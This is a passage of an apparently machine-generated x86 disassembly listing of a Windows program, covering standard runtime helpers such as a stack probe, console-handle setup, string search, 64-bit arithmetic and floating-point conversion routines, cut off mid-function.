sub_4117B0	proc near		; CODE XREF: sub_410860+11j
					; .text:00410887j ...
		push	ecx
		lea	ecx, [esp+4]
		sub	ecx, eax
		sbb	eax, eax
		not	eax
		and	ecx, eax
		mov	eax, esp
		and	eax, 0FFFFF000h

loc_4117C4:				; CODE XREF: sub_4117B0+29j
		cmp	ecx, eax
		jb	short loc_4117D2
		mov	eax, ecx
		pop	ecx
		xchg	eax, esp
		mov	eax, [eax]
		mov	[esp+0], eax
		retn
; ---------------------------------------------------------------------------

loc_4117D2:				; CODE XREF: sub_4117B0+16j
		sub	eax, 1000h
		test	[eax], eax
		jmp	short loc_4117C4
sub_4117B0	endp


; =============== S U B	R O U T	I N E =======================================



sub_4117DB	proc near		; CODE XREF: sub_41088C+24p
		xor	eax, eax
		push	eax
		push	eax
		push	3
		push	eax
		push	3
		push	40000000h
		push	offset aConout	; "CONOUT$"
		call	ds:dword_41D06C	; CreateFileA
		mov	dword_424224, eax
		retn
sub_4117DB	endp


; =============== S U B	R O U T	I N E =======================================



sub_4117FA	proc near		; DATA XREF: _1fieagrn:0041D2F4o
		mov	eax, dword_424224
		cmp	eax, 0FFFFFFFFh
		push	esi
		mov	esi, ds:dword_41D0D8
		jz	short loc_411813
		cmp	eax, 0FFFFFFFEh
		jz	short loc_411813
		push	eax
		call	esi	; CloseHandle

loc_411813:				; CODE XREF: sub_4117FA+Fj
					; sub_4117FA+14j
		mov	eax, dword_424220
		cmp	eax, 0FFFFFFFFh
		jz	short loc_411825
		cmp	eax, 0FFFFFFFEh
		jz	short loc_411825
		push	eax
		call	esi	; CloseHandle

loc_411825:				; CODE XREF: sub_4117FA+21j
					; sub_4117FA+26j
		pop	esi
		retn
sub_4117FA	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_411830	proc near		; CODE XREF: sub_41105D+102p

arg_0		= dword	ptr  8
arg_4		= byte ptr  0Ch

		push	ebp
		mov	ebp, esp
		push	edi
		mov	edi, [ebp+arg_0]
		xor	eax, eax
		or	ecx, 0FFFFFFFFh
		repne scasb
		add	ecx, 1
		neg	ecx
		sub	edi, 1
		mov	al, [ebp+arg_4]
		std
		repne scasb
		add	edi, 1
		cmp	[edi], al
		jz	short loc_411857
		xor	eax, eax
		jmp	short loc_411859
; ---------------------------------------------------------------------------

loc_411857:				; CODE XREF: sub_411830+21j
		mov	eax, edi

loc_411859:				; CODE XREF: sub_411830+25j
		cld
		pop	edi
		leave
		retn
sub_411830	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41185D	proc near		; CODE XREF: sub_410D74+15p

var_28		= byte ptr -28h
var_24		= byte ptr -24h
var_1C		= dword	ptr -1Ch
var_18		= byte ptr -18h
var_14		= dword	ptr -14h
var_10		= byte ptr -10h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 28h
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	ebx
		push	esi
		mov	esi, [ebp+arg_0]
		push	edi
		push	[ebp+arg_8]
		mov	edi, [ebp+arg_4]
		lea	ecx, [ebp+var_24]
		call	sub_402ADF
		lea	eax, [ebp+var_24]
		push	eax
		xor	ebx, ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	edi
		lea	eax, [ebp+var_28]
		push	eax
		lea	eax, [ebp+var_10]
		push	eax
		call	sub_41279D
		mov	[ebp+var_14], eax
		lea	eax, [ebp+var_10]
		push	esi
		push	eax
		call	sub_411D19
		add	esp, 28h
		test	byte ptr [ebp+var_14], 3
		jnz	short loc_4118DA
		cmp	eax, 1
		jnz	short loc_4118C5

loc_4118B4:				; CODE XREF: sub_41185D+87j
		cmp	[ebp+var_18], bl
		jz	short loc_4118C0
		mov	eax, [ebp+var_1C]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_4118C0:				; CODE XREF: sub_41185D+5Aj
		push	3

loc_4118C2:				; CODE XREF: sub_41185D+7Bj
		pop	eax
		jmp	short loc_4118F4
; ---------------------------------------------------------------------------

loc_4118C5:				; CODE XREF: sub_41185D+55j
		cmp	eax, 2
		jnz	short loc_4118E6

loc_4118CA:				; CODE XREF: sub_41185D+81j
		cmp	[ebp+var_18], bl
		jz	short loc_4118D6
		mov	eax, [ebp+var_1C]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_4118D6:				; CODE XREF: sub_41185D+70j
		push	4
		jmp	short loc_4118C2
; ---------------------------------------------------------------------------

loc_4118DA:				; CODE XREF: sub_41185D+50j
		test	byte ptr [ebp+var_14], 1
		jnz	short loc_4118CA
		test	byte ptr [ebp+var_14], 2
		jnz	short loc_4118B4

loc_4118E6:				; CODE XREF: sub_41185D+6Bj
		cmp	[ebp+var_18], bl
		jz	short loc_4118F2
		mov	eax, [ebp+var_1C]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_4118F2:				; CODE XREF: sub_41185D+8Cj
		xor	eax, eax

loc_4118F4:				; CODE XREF: sub_41185D+66j
		mov	ecx, [ebp+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402AD0
		leave
		retn
sub_41185D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_411903	proc near		; CODE XREF: sub_410D74+2Ep

var_28		= byte ptr -28h
var_24		= byte ptr -24h
var_1C		= dword	ptr -1Ch
var_18		= byte ptr -18h
var_14		= dword	ptr -14h
var_10		= byte ptr -10h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 28h
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	ebx
		push	esi
		mov	esi, [ebp+arg_0]
		push	edi
		push	[ebp+arg_8]
		mov	edi, [ebp+arg_4]
		lea	ecx, [ebp+var_24]
		call	sub_402ADF
		lea	eax, [ebp+var_24]
		push	eax
		xor	ebx, ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	edi
		lea	eax, [ebp+var_28]
		push	eax
		lea	eax, [ebp+var_10]
		push	eax
		call	sub_41279D
		mov	[ebp+var_14], eax
		lea	eax, [ebp+var_10]
		push	esi
		push	eax
		call	sub_41225B
		add	esp, 28h
		test	byte ptr [ebp+var_14], 3
		jnz	short loc_411980
		cmp	eax, 1
		jnz	short loc_41196B

loc_41195A:				; CODE XREF: sub_411903+87j
		cmp	[ebp+var_18], bl
		jz	short loc_411966
		mov	eax, [ebp+var_1C]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_411966:				; CODE XREF: sub_411903+5Aj
		push	3

loc_411968:				; CODE XREF: sub_411903+7Bj
		pop	eax
		jmp	short loc_41199A
; ---------------------------------------------------------------------------

loc_41196B:				; CODE XREF: sub_411903+55j
		cmp	eax, 2
		jnz	short loc_41198C

loc_411970:				; CODE XREF: sub_411903+81j
		cmp	[ebp+var_18], bl
		jz	short loc_41197C
		mov	eax, [ebp+var_1C]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_41197C:				; CODE XREF: sub_411903+70j
		push	4
		jmp	short loc_411968
; ---------------------------------------------------------------------------

loc_411980:				; CODE XREF: sub_411903+50j
		test	byte ptr [ebp+var_14], 1
		jnz	short loc_411970
		test	byte ptr [ebp+var_14], 2
		jnz	short loc_41195A

loc_41198C:				; CODE XREF: sub_411903+6Bj
		cmp	[ebp+var_18], bl
		jz	short loc_411998
		mov	eax, [ebp+var_1C]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_411998:				; CODE XREF: sub_411903+8Cj
		xor	eax, eax

loc_41199A:				; CODE XREF: sub_411903+66j
		mov	ecx, [ebp+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402AD0
		leave
		retn
sub_411903	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4119A9	proc near		; CODE XREF: sub_410F71+96p
					; sub_4114C3+85p ...

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		mov	ecx, [ebp+arg_C]
		push	ebx
		push	esi
		mov	esi, [ebp+arg_0]
		xor	ebx, ebx
		cmp	esi, ebx
		push	edi
		mov	edi, [ecx+0Ch]
		jnz	short loc_4119DC

loc_4119BE:				; CODE XREF: sub_4119A9+36j
		call	sub_405B83
		push	16h
		pop	esi
		mov	[eax], esi

loc_4119C8:				; CODE XREF: sub_4119A9+59j
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		call	sub_4032F9
		add	esp, 14h
		mov	eax, esi
		jmp	loc_411A61
; ---------------------------------------------------------------------------

loc_4119DC:				; CODE XREF: sub_4119A9+13j
		cmp	[ebp+arg_4], ebx
		jbe	short loc_4119BE
		mov	edx, [ebp+arg_8]
		cmp	edx, ebx
		mov	[esi], bl
		jle	short loc_4119EE
		mov	eax, edx
		jmp	short loc_4119F0
; ---------------------------------------------------------------------------

loc_4119EE:				; CODE XREF: sub_4119A9+3Fj
		xor	eax, eax

loc_4119F0:				; CODE XREF: sub_4119A9+43j
		inc	eax
		cmp	[ebp+arg_4], eax
		ja	short loc_411A04
		call	sub_405B83
		push	22h
		pop	ecx
		mov	[eax], ecx
		mov	esi, ecx
		jmp	short loc_4119C8
; ---------------------------------------------------------------------------

loc_411A04:				; CODE XREF: sub_4119A9+4Bj
		cmp	edx, ebx
		mov	byte ptr [esi],	30h
		lea	eax, [esi+1]
		jle	short loc_411A28

loc_411A0E:				; CODE XREF: sub_4119A9+7Aj
		mov	cl, [edi]
		cmp	cl, bl
		jz	short loc_411A1A
		movsx	ecx, cl
		inc	edi
		jmp	short loc_411A1D
; ---------------------------------------------------------------------------

loc_411A1A:				; CODE XREF: sub_4119A9+69j
		push	30h
		pop	ecx

loc_411A1D:				; CODE XREF: sub_4119A9+6Fj
		mov	[eax], cl
		inc	eax
		dec	edx
		cmp	edx, ebx
		jg	short loc_411A0E
		mov	ecx, [ebp+arg_C]

loc_411A28:				; CODE XREF: sub_4119A9+63j
		cmp	edx, ebx
		mov	[eax], bl
		jl	short loc_411A40
		cmp	byte ptr [edi],	35h
		jl	short loc_411A40
		jmp	short loc_411A38
; ---------------------------------------------------------------------------

loc_411A35:				; CODE XREF: sub_4119A9+93j
		mov	byte ptr [eax],	30h

loc_411A38:				; CODE XREF: sub_4119A9+8Aj
		dec	eax
		cmp	byte ptr [eax],	39h
		jz	short loc_411A35
		inc	byte ptr [eax]

loc_411A40:				; CODE XREF: sub_4119A9+83j
					; sub_4119A9+88j
		cmp	byte ptr [esi],	31h
		jnz	short loc_411A4A
		inc	dword ptr [ecx+4]
		jmp	short loc_411A5F
; ---------------------------------------------------------------------------

loc_411A4A:				; CODE XREF: sub_4119A9+9Aj
		lea	edi, [esi+1]
		push	edi
		call	sub_4044E0
		inc	eax
		push	eax
		push	edi
		push	esi
		call	sub_407720
		add	esp, 10h

loc_411A5F:				; CODE XREF: sub_4119A9+9Fj
		xor	eax, eax

loc_411A61:				; CODE XREF: sub_4119A9+2Ej
		pop	edi
		pop	esi
		pop	ebx
		pop	ebp
		retn
sub_4119A9	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_411A66	proc near		; CODE XREF: sub_411B21+24p

var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		push	ecx
		mov	edx, [ebp+arg_4]
		movzx	eax, word ptr [edx+6]
		push	ebx
		mov	ecx, eax
		push	esi
		push	edi
		shr	ecx, 4
		and	eax, 8000h
		mov	edi, 7FFh
		and	ecx, edi
		mov	[ebp+arg_4], eax
		mov	eax, [edx+4]
		mov	edx, [edx]
		movzx	ebx, cx
		mov	esi, 80000000h
		and	eax, 0FFFFFh
		test	ebx, ebx
		mov	[ebp+var_4], esi
		jz	short loc_411AB4
		cmp	ebx, edi
		jz	short loc_411AAD
		add	ecx, 3C00h
		jmp	short loc_411AD5
; ---------------------------------------------------------------------------

loc_411AAD:				; CODE XREF: sub_411A66+3Dj
		mov	edi, 7FFFh
		jmp	short loc_411AD8
; ---------------------------------------------------------------------------

loc_411AB4:				; CODE XREF: sub_411A66+39j
		xor	ebx, ebx
		cmp	eax, ebx
		jnz	short loc_411ACC
		cmp	edx, ebx
		jnz	short loc_411ACC
		mov	eax, [ebp+arg_0]
		mov	cx, word ptr [ebp+arg_4]
		mov	[eax+4], ebx
		mov	[eax], ebx
		jmp	short loc_411B18
; ---------------------------------------------------------------------------

loc_411ACC:				; CODE XREF: sub_411A66+52j
					; sub_411A66+56j
		add	ecx, 3C01h
		mov	[ebp+var_4], ebx

loc_411AD5:				; CODE XREF: sub_411A66+45j
		movzx	edi, cx

loc_411AD8:				; CODE XREF: sub_411A66+4Cj
		mov	ecx, edx
		shr	ecx, 15h
		shl	eax, 0Bh
		or	ecx, eax
		or	ecx, [ebp+var_4]
		mov	eax, [ebp+arg_0]
		shl	edx, 0Bh
		test	ecx, esi
		mov	[eax+4], ecx
		mov	[eax], edx
		jnz	short loc_411B13

loc_411AF4:				; CODE XREF: sub_411A66+ABj
		mov	ecx, [eax]
		mov	edx, [eax+4]
		mov	ebx, ecx
		add	edx, edx
		shr	ebx, 1Fh
		or	edx, ebx
		add	ecx, ecx
		add	edi, 0FFFFh
		test	edx, esi
		mov	[eax+4], edx
		mov	[eax], ecx
		jz	short loc_411AF4

loc_411B13:				; CODE XREF: sub_411A66+8Cj
		mov	ecx, [ebp+arg_4]
		or	ecx, edi

loc_411B18:				; CODE XREF: sub_411A66+64j
		pop	edi
		pop	esi
		mov	[eax+8], cx
		pop	ebx
		leave
		retn
sub_411A66	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_411B21	proc near		; CODE XREF: sub_410F71+2Ap
					; sub_4114C3+2Ap ...

var_30		= dword	ptr -30h
var_2C		= word ptr -2Ch
var_2A		= byte ptr -2Ah
var_28		= byte ptr -28h
var_10		= byte ptr -10h
var_4		= dword	ptr -4
arg_0		= byte ptr  8
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		sub	esp, 30h
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		mov	eax, [ebp+arg_C]
		push	ebx
		mov	ebx, [ebp+arg_8]
		push	esi
		mov	[ebp+var_30], eax
		push	edi
		lea	eax, [ebp+arg_0]
		push	eax
		lea	eax, [ebp+var_10]
		push	eax
		call	sub_411A66
		pop	ecx
		pop	ecx
		lea	eax, [ebp+var_2C]
		push	eax
		push	0
		push	11h
		sub	esp, 0Ch
		lea	esi, [ebp+var_10]
		mov	edi, esp
		movsd
		movsd
		movsw
		call	sub_412E61
		mov	esi, [ebp+var_30]
		mov	[ebx+8], eax
		movsx	eax, [ebp+var_2A]
		mov	[ebx], eax
		movsx	eax, [ebp+var_2C]
		mov	[ebx+4], eax
		lea	eax, [ebp+var_28]
		push	eax
		push	[ebp+arg_10]
		push	esi
		call	sub_407A85
		add	esp, 24h
		test	eax, eax
		jz	short loc_411B9B
		xor	eax, eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		call	sub_4031FD
		add	esp, 14h

loc_411B9B:				; CODE XREF: sub_411B21+69j
		mov	ecx, [ebp+var_4]
		pop	edi
		mov	[ebx+0Ch], esi
		pop	esi
		mov	eax, ebx
		xor	ecx, ebp
		pop	ebx
		call	sub_402AD0
		leave
		retn
sub_411B21	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_411BB0	proc near		; CODE XREF: sub_41105D+2F7p
					; sub_41105D+31Dp ...

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch
arg_C		= dword	ptr  10h

		push	edi
		push	esi
		push	ebp
		xor	edi, edi
		xor	ebp, ebp
		mov	eax, [esp+0Ch+arg_4]
		or	eax, eax
		jge	short loc_411BD4
		inc	edi
		inc	ebp
		mov	edx, [esp+0Ch+arg_0]
		neg	eax
		neg	edx
		sbb	eax, 0
		mov	[esp+0Ch+arg_4], eax
		mov	[esp+0Ch+arg_0], edx

loc_411BD4:				; CODE XREF: sub_411BB0+Dj
		mov	eax, [esp+0Ch+arg_C]
		or	eax, eax
		jge	short loc_411BF0
		inc	edi
		mov	edx, [esp+0Ch+arg_8]
		neg	eax
		neg	edx
		sbb	eax, 0
		mov	[esp+0Ch+arg_C], eax
		mov	[esp+0Ch+arg_8], edx

loc_411BF0:				; CODE XREF: sub_411BB0+2Aj
		or	eax, eax
		jnz	short loc_411C1C
		mov	ecx, [esp+0Ch+arg_8]
		mov	eax, [esp+0Ch+arg_4]
		xor	edx, edx
		div	ecx
		mov	ebx, eax
		mov	eax, [esp+0Ch+arg_0]
		div	ecx
		mov	esi, eax
		mov	eax, ebx
		mul	[esp+0Ch+arg_8]
		mov	ecx, eax
		mov	eax, esi
		mul	[esp+0Ch+arg_8]
		add	edx, ecx
		jmp	short loc_411C63
; ---------------------------------------------------------------------------

loc_411C1C:				; CODE XREF: sub_411BB0+42j
		mov	ebx, eax
		mov	ecx, [esp+0Ch+arg_8]
		mov	edx, [esp+0Ch+arg_4]
		mov	eax, [esp+0Ch+arg_0]

loc_411C2A:				; CODE XREF: sub_411BB0+84j
		shr	ebx, 1
		rcr	ecx, 1
		shr	edx, 1
		rcr	eax, 1
		or	ebx, ebx
		jnz	short loc_411C2A
		div	ecx
		mov	esi, eax
		mul	[esp+0Ch+arg_C]
		mov	ecx, eax
		mov	eax, [esp+0Ch+arg_8]
		mul	esi
		add	edx, ecx
		jb	short loc_411C58
		cmp	edx, [esp+0Ch+arg_4]
		ja	short loc_411C58
		jb	short loc_411C61
		cmp	eax, [esp+0Ch+arg_0]
		jbe	short loc_411C61

loc_411C58:				; CODE XREF: sub_411BB0+98j
					; sub_411BB0+9Ej
		dec	esi
		sub	eax, [esp+0Ch+arg_8]
		sbb	edx, [esp+0Ch+arg_C]

loc_411C61:				; CODE XREF: sub_411BB0+A0j
					; sub_411BB0+A6j
		xor	ebx, ebx

loc_411C63:				; CODE XREF: sub_411BB0+6Aj
		sub	eax, [esp+0Ch+arg_0]
		sbb	edx, [esp+0Ch+arg_4]
		dec	ebp
		jns	short loc_411C75
		neg	edx
		neg	eax
		sbb	edx, 0

loc_411C75:				; CODE XREF: sub_411BB0+BCj
		mov	ecx, edx
		mov	edx, ebx
		mov	ebx, ecx
		mov	ecx, eax
		mov	eax, esi
		dec	edi
		jnz	short loc_411C89
		neg	edx
		neg	eax
		sbb	edx, 0

loc_411C89:				; CODE XREF: sub_411BB0+D0j
		pop	ebp
		pop	esi
		pop	edi
		retn	10h
sub_411BB0	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_411C90	proc near		; CODE XREF: sub_41105D+1EAp
					; sub_41105D+23Ep ...
		cmp	cl, 40h
		jnb	short loc_411CAA
		cmp	cl, 20h
		jnb	short loc_411CA0
		shrd	eax, edx, cl
		shr	edx, cl
		retn
; ---------------------------------------------------------------------------

loc_411CA0:				; CODE XREF: sub_411C90+8j
		mov	eax, edx
		xor	edx, edx
		and	cl, 1Fh
		shr	eax, cl
		retn
; ---------------------------------------------------------------------------

loc_411CAA:				; CODE XREF: sub_411C90+3j
		xor	eax, eax
		xor	edx, edx
		retn
sub_411C90	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_411CAF	proc near		; CODE XREF: sub_41171B+Ep

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		mov	eax, [ebp+arg_8]
		mov	ecx, [ebp+arg_4]
		and	eax, 0FFF7FFFFh
		and	ecx, eax
		test	ecx, 0FCF0FCE0h
		push	esi
		jz	short loc_411CF9
		push	edi
		mov	edi, [ebp+arg_0]
		xor	esi, esi
		cmp	edi, esi
		jz	short loc_411CDD
		push	esi
		push	esi
		call	sub_413857
		pop	ecx
		pop	ecx
		mov	[edi], eax

loc_411CDD:				; CODE XREF: sub_411CAF+21j
		call	sub_405B83
		push	16h
		pop	edi
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	[eax], edi
		call	sub_4032F9
		add	esp, 14h
		mov	eax, edi
		pop	edi
		jmp	short loc_411D16
; ---------------------------------------------------------------------------

loc_411CF9:				; CODE XREF: sub_411CAF+17j
		mov	esi, [ebp+arg_0]
		test	esi, esi
		push	eax
		push	[ebp+arg_4]
		jz	short loc_411D0D
		call	sub_413857
		mov	[esi], eax
		jmp	short loc_411D12
; ---------------------------------------------------------------------------

loc_411D0D:				; CODE XREF: sub_411CAF+53j
		call	sub_413857

loc_411D12:				; CODE XREF: sub_411CAF+5Cj
		pop	ecx
		pop	ecx
		xor	eax, eax

loc_411D16:				; CODE XREF: sub_411CAF+48j
		pop	esi
		pop	ebp
		retn
sub_411CAF	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_411D19	proc near		; CODE XREF: sub_41185D+44p

var_2C		= byte ptr -2Ch
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 2Ch
		mov	eax, [ebp+arg_0]
		movzx	ecx, word ptr [eax+0Ah]
		push	ebx
		mov	ebx, ecx
		and	ecx, 8000h
		mov	[ebp+var_14], ecx
		mov	ecx, [eax+6]
		mov	[ebp+var_20], ecx
		mov	ecx, [eax+2]
		movzx	eax, word ptr [eax]
		and	ebx, 7FFFh
		sub	ebx, 3FFFh
		shl	eax, 10h
		cmp	ebx, 0FFFFC001h
		push	edi
		mov	[ebp+var_1C], ecx
		mov	[ebp+var_18], eax
		jnz	short loc_411D83
		xor	ebx, ebx
		xor	eax, eax

loc_411D60:				; CODE XREF: sub_411D19+51j
		cmp	[ebp+eax*4+var_20], ebx
		jnz	short loc_411D73
		inc	eax
		cmp	eax, 3
		jl	short loc_411D60
		xor	eax, eax
		jmp	loc_412218
; ---------------------------------------------------------------------------

loc_411D73:				; CODE XREF: sub_411D19+4Bj
		xor	eax, eax
		lea	edi, [ebp+var_20]
		stosd
		stosd
		push	2
		stosd
		pop	eax
		jmp	loc_412218
; ---------------------------------------------------------------------------

loc_411D83:				; CODE XREF: sub_411D19+41j
		and	[ebp+arg_0], 0
		push	esi
		lea	esi, [ebp+var_20]
		lea	edi, [ebp+var_2C]
		movsd
		movsd
		movsd
		mov	esi, dword_424238
		dec	esi
		lea	ecx, [esi+1]
		mov	eax, ecx
		cdq
		and	edx, 1Fh
		add	eax, edx
		sar	eax, 5
		mov	edx, ecx
		and	edx, 8000001Fh
		mov	[ebp+var_10], ebx
		mov	[ebp+var_C], eax
		jns	short loc_411DBB
		dec	edx
		or	edx, 0FFFFFFE0h
		inc	edx

loc_411DBB:				; CODE XREF: sub_411D19+9Bj
		lea	edi, [ebp+eax*4+var_20]
		push	1Fh
		xor	eax, eax
		pop	ecx
		sub	ecx, edx
		inc	eax
		shl	eax, cl
		mov	[ebp+var_8], ecx
		test	[edi], eax
		jz	loc_411E61
		mov	eax, [ebp+var_C]
		or	edx, 0FFFFFFFFh
		shl	edx, cl
		not	edx
		test	[ebp+eax*4+var_20], edx
		jmp	short loc_411DE9
; ---------------------------------------------------------------------------

loc_411DE4:				; CODE XREF: sub_411D19+D6j
		cmp	[ebp+eax*4+var_20], 0

loc_411DE9:				; CODE XREF: sub_411D19+C9j
		jnz	short loc_411DF3
		inc	eax
		cmp	eax, 3
		jl	short loc_411DE4
		jmp	short loc_411E61
; ---------------------------------------------------------------------------

loc_411DF3:				; CODE XREF: sub_411D19:loc_411DE9j
		mov	eax, esi
		cdq
		push	1Fh
		pop	ecx
		and	edx, ecx
		add	eax, edx
		sar	eax, 5
		and	esi, 8000001Fh
		jns	short loc_411E0D
		dec	esi
		or	esi, 0FFFFFFE0h
		inc	esi

loc_411E0D:				; CODE XREF: sub_411D19+EDj
		and	[ebp+var_4], 0
		sub	ecx, esi
		xor	edx, edx
		inc	edx
		shl	edx, cl
		lea	ecx, [ebp+eax*4+var_20]
		mov	esi, [ecx]
		add	esi, edx
		mov	[ebp+arg_0], esi
		mov	esi, [ecx]
		cmp	[ebp+arg_0], esi
		jb	short loc_411E4C
		cmp	[ebp+arg_0], edx
		jmp	short loc_411E4A
; ---------------------------------------------------------------------------

loc_411E2F:				; CODE XREF: sub_411D19+143j
		test	ecx, ecx
		jz	short loc_411E5E
		and	[ebp+var_4], 0
		lea	ecx, [ebp+eax*4+var_20]
		mov	edx, [ecx]
		lea	esi, [edx+1]
		cmp	esi, edx
		mov	[ebp+arg_0], esi
		jb	short loc_411E4C
		cmp	esi, 1

loc_411E4A:				; CODE XREF: sub_411D19+114j
		jnb	short loc_411E53

loc_411E4C:				; CODE XREF: sub_411D19+10Fj
					; sub_411D19+12Cj
		mov	[ebp+var_4], 1

loc_411E53:				; CODE XREF: sub_411D19:loc_411E4Aj
		dec	eax
		mov	edx, [ebp+arg_0]
		mov	[ecx], edx
		mov	ecx, [ebp+var_4]
		jns	short loc_411E2F

loc_411E5E:				; CODE XREF: sub_411D19+118j
		mov	[ebp+arg_0], ecx

loc_411E61:				; CODE XREF: sub_411D19+B5j
					; sub_411D19+D8j
		mov	ecx, [ebp+var_8]
		or	eax, 0FFFFFFFFh
		shl	eax, cl
		and	[edi], eax
		mov	eax, [ebp+var_C]
		inc	eax
		cmp	eax, 3
		jge	short loc_411E81
		push	3
		pop	ecx
		lea	edi, [ebp+eax*4+var_20]
		sub	ecx, eax
		xor	eax, eax
		rep stosd

loc_411E81:				; CODE XREF: sub_411D19+159j
		cmp	[ebp+arg_0], 0
		jz	short loc_411E88
		inc	ebx

loc_411E88:				; CODE XREF: sub_411D19+16Cj
		mov	eax, dword_424234
		mov	ecx, eax
		sub	ecx, dword_424238
		cmp	ebx, ecx
		jge	short loc_411EA6
		xor	eax, eax
		lea	edi, [ebp+var_20]
		stosd
		stosd
		stosd
		jmp	loc_4120B3
; ---------------------------------------------------------------------------

loc_411EA6:				; CODE XREF: sub_411D19+17Ej
		cmp	ebx, eax
		jg	loc_4120BD
		sub	eax, [ebp+var_10]
		lea	esi, [ebp+var_2C]
		mov	ecx, eax
		lea	edi, [ebp+var_20]
		movsd
		cdq
		and	edx, 1Fh
		add	eax, edx
		movsd
		mov	edx, ecx
		sar	eax, 5
		and	edx, 8000001Fh
		movsd
		jns	short loc_411ED4
		dec	edx
		or	edx, 0FFFFFFE0h
		inc	edx

loc_411ED4:				; CODE XREF: sub_411D19+1B4j
		and	[ebp+var_C], 0
		and	[ebp+arg_0], 0
		or	edi, 0FFFFFFFFh
		mov	ecx, edx
		shl	edi, cl
		mov	[ebp+var_4], 20h
		sub	[ebp+var_4], edx
		not	edi

loc_411EEF:				; CODE XREF: sub_411D19+201j
		mov	ebx, [ebp+arg_0]
		lea	ebx, [ebp+ebx*4+var_20]
		mov	esi, [ebx]
		mov	ecx, esi
		and	ecx, edi
		mov	[ebp+var_10], ecx
		mov	ecx, edx
		shr	esi, cl
		mov	ecx, [ebp+var_4]
		or	esi, [ebp+var_C]
		mov	[ebx], esi
		mov	esi, [ebp+var_10]
		shl	esi, cl
		inc	[ebp+arg_0]
		cmp	[ebp+arg_0], 3
		mov	[ebp+var_C], esi
		jl	short loc_411EEF
		mov	esi, eax
		push	2
		shl	esi, 2
		lea	ecx, [ebp+var_18]
		pop	edx
		sub	ecx, esi

loc_411F29:				; CODE XREF: sub_411D19+227j
		cmp	edx, eax
		jl	short loc_411F35
		mov	esi, [ecx]
		mov	[ebp+edx*4+var_20], esi
		jmp	short loc_411F3A
; ---------------------------------------------------------------------------

loc_411F35:				; CODE XREF: sub_411D19+212j
		and	[ebp+edx*4+var_20], 0

loc_411F3A:				; CODE XREF: sub_411D19+21Aj
		dec	edx
		sub	ecx, 4
		test	edx, edx
		jge	short loc_411F29
		mov	esi, dword_424238
		dec	esi
		lea	ecx, [esi+1]
		mov	eax, ecx
		cdq
		and	edx, 1Fh
		add	eax, edx
		sar	eax, 5
		mov	edx, ecx
		and	edx, 8000001Fh
		mov	[ebp+var_C], eax
		jns	short loc_411F69
		dec	edx
		or	edx, 0FFFFFFE0h
		inc	edx

loc_411F69:				; CODE XREF: sub_411D19+249j
		push	1Fh
		pop	ecx
		sub	ecx, edx
		xor	edx, edx
		inc	edx
		shl	edx, cl
		lea	ebx, [ebp+eax*4+var_20]
		mov	[ebp+var_10], ecx
		test	[ebx], edx
		jz	loc_412004
		or	edx, 0FFFFFFFFh
		shl	edx, cl
		not	edx
		test	[ebp+eax*4+var_20], edx
		jmp	short loc_411F94
; ---------------------------------------------------------------------------

loc_411F8F:				; CODE XREF: sub_411D19+281j
		cmp	[ebp+eax*4+var_20], 0

loc_411F94:				; CODE XREF: sub_411D19+274j
		jnz	short loc_411F9E
		inc	eax
		cmp	eax, 3
		jl	short loc_411F8F
		jmp	short loc_412004
; ---------------------------------------------------------------------------

loc_411F9E:				; CODE XREF: sub_411D19:loc_411F94j
		mov	eax, esi
		cdq
		push	1Fh
		pop	ecx
		and	edx, ecx
		add	eax, edx
		sar	eax, 5
		and	esi, 8000001Fh
